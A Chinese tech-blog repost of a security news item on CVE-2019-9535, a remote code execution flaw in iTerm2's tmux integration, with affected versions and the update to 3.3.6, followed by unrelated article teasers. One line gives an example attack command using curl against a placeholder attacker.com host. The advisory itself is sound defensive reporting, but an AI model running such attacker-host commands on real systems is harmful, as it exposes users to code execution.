当前位置:首页 > 其他 > 用Mac的同志请警惕!你可能做了黑客七年的肉鸡!

用Mac的同志请警惕!你可能做了黑客七年的肉鸡!

转载自:腾讯掌控安全学院 2019-10-29 其他 948
分享给朋友:

v2-d80d8aae9fbd74a93cd858c1094312a7_1200x500.jpg

由 网络安全公司 (ROS) 发布的审计结果显示, iTerm 2 中存在一个严重的远程代码执行 (RCE) 漏洞,且至少已存在7年,知晓此漏洞的黑客,可以对存在漏洞的目标进行任意控制。

iTerm 2 简介

iTerm2 是全球最热门的终端模拟器之一,是开发人员经常使用的 MacOS 终端工具,是 Mac 内置终端 app 最有力的热门开源工具替代品之一,被很多开发人员称为“Mac 终端利器”。

漏洞概述

CVE 编号:CVE-2019-9535。

该漏洞描述:ROS 在iTerm2 的 tmux集成功能中找到了一个至少已存在7年之久的严重漏洞。黑客如果能输出终端,则在很多情况下能够在目标计算机上执行命令。

攻击案例:使目标连接到由攻击者控制的 SSH 服务器或其他恶意命令

curl http://attacker.com and tail -f /var/log/apache2/referer_log

Nachman 认为该漏洞影响的iTerm2 用户数量介于10万至20万之间。

Mozilla 公司的安全工程师 Tom Ritter 指出,这个漏洞源自 iTerm2 中的 tmux 集成功能。Tumx 应用程序是一款终端多路复用器,可允许从单个设备创建并控制多个终端。

CERT 协调中心发布漏洞通知表示,可通过使用命令行工具在终端屏幕上打印由攻击者控制的内容,从而利用该漏洞。该中心指出,“潜在的攻击向量包括通过 ssh 连接至恶意服务器,通过curl 获取恶意网站,或者通过 tail –f 跟踪包含某些恶意内容的日志文件。”

一般情况下,该漏洞需要某些用户交互或伎俩才能遭触发,但由于它可通过通常被认为是安全的命令利用,因此它的潜在影响力巨大。

影响版本

该漏洞影响于本周早些时候发布的 3.3.5 版本及之前版本。

修复方案

v2-aaed4684dfc760832d0d474b3ab2a2f1_hd.jpg

目前补丁已发布但自动更新尚未推送,立即在 iTerm2 目录中选择“检查新版本”手动更新至最新版本 3.3.6,即可修复该漏洞啦!

分享给朋友:

相关文章

gocron数据库表和字段字符集转换为utf8mb4

gocron_sql_convert_to_utf8mb4因为 gocron - 定时任务管理系统 默认表和字段字符集是utf8(也就是utf8mb3),所以在现下很多数据存储会有问题,最为突出的就是emoji表情写了一个简单的转换sql:git地址 有用到的小伙伴可以拿去直接转换

为集群搭建一个定时任务集中调度系统

集群任务下,很多服务器的定时任务都单独集中在相对应的服务器crontab下,即使现在有了类似于宝塔之类的面板,但是定时任务还是得每台服务器单独登入后去配置。是否可以单独在一台机子上,控制所有的集群定时任务呢?答案是肯定的!!!gocron就可以做到,之前博主分享过单机搭建定时任务管理系统,那现在,我

Linux 日志清理

磁盘占用90%,占用过多,分析日志查看原因

如何在Linux上做一个定时任务管理系统

gocron,使用Go语言开发的轻量级定时任务集中调度和管理系统, 用于替代Linux-crontab

Nginx 自动生成日志备份

Nginx网站访问日志数据会随着访问量的增加而日益庞大,以下介绍一个简单的脚本,自动切割备份过往日期日志数据

3月18日,多年的老站终于破了1.5W的PV

从最早的建站初心是为了自己方便,从fivefilm.com到30942.com,有网友说域名不好记,索性注册了看个蛋(kangedan.com)的域名。6年多的时间(我也是随性等得起)0推广,纯自然流量!今天看了下PV记录,有点被吓到!特别纪念一下,之前都是几千IP,封顶也没超过1.5W。

如果你懂得用Excel,微软Power Fx助你成为一名优秀的程序员

在程序员的世界中,打开第一扇门永远是Hello World!这是Power Fx的一段最基础的语法。微软宣布推出新的开源编程语言 Power Fx,一种基于 Microsoft Excel 的低代码公式语言;将可以在整个 Microsoft Power Platform 中进行使用。该语言背后的动机

微软推出Go语言从入门到上手的文档

微软有自己的技术文档专栏网站,可能很多小伙伴都不知道!除了自己的.NET语言,还包括了市面上绝大多数流行语言的技术文档都有。这次,微软把Go语言也加入到了自家技术文档网站中,而且绝大多数文档都是有中文版本的!点击直接访问:更多文档访问以下地址:https://docs.microsoft.com/z

Deno初体验:一个简单的MVC案例

Deno 是一个 JavaScript/TypeScript 的运行时,默认使用安全环境执行代码,有着卓越的开发体验。Deno 含有以下功能亮点:

【年度重磅】阿里淘系全年技术总结黑皮书,1500页免费下载!

淘系技术将2020一整年的精华内容梳理合并,重磅推出【淘系技术2020技术年货】。在这本书中,你将看到:各技术栈下时新前沿的技术讲解与方法技巧、淘系技术大牛的职场成长经验&学习问答实录、年度精选技术人员必读书单、淘系经典开源项目介绍、2020淘系顶会 paper 全文。